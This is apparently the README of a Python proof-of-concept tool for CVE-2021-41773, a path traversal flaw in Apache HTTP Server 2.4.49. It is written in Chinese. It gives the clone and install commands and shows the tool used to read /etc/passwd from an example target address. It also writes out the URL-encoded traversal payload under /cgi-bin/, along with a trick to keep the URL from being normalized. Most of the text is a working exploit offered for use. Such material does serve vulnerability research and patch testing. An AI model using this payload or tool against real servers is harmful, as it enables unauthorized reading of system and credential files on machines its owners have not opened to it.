一个针对CVE-2021-41773的Python利用工具,这是Apache HTTP Server 2.4.49中的一个路径遍历漏洞,允许从服务器读取任意文件。
CVE-2021-41773 是Apache HTTP Server 2.4.49中的一个路径遍历漏洞,由于对用户提供的路径验证不当导致。攻击者可以通过使用URL编码的路径遍历序列读取文档根目录之外的文件。
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
python3 cve-2021-41773.py -t <target> -f <file_path>
-t, --target: 目标URL (根据需要包含协议和端口)-f, --file: 从服务器读取的文件路径# 读取 /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

该利用工具使用URL编码的路径遍历序列(.%2e/%2e%2e/)来绕过Apache的路径验证:
.%2e)绕过了初始安全检查关键之处在于使用urllib3.PoolManager()而不是requests.get(),以防止自动的URL规范化导致利用失败。
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}
这相当于:
/cgi-bin/../../../../{target_file}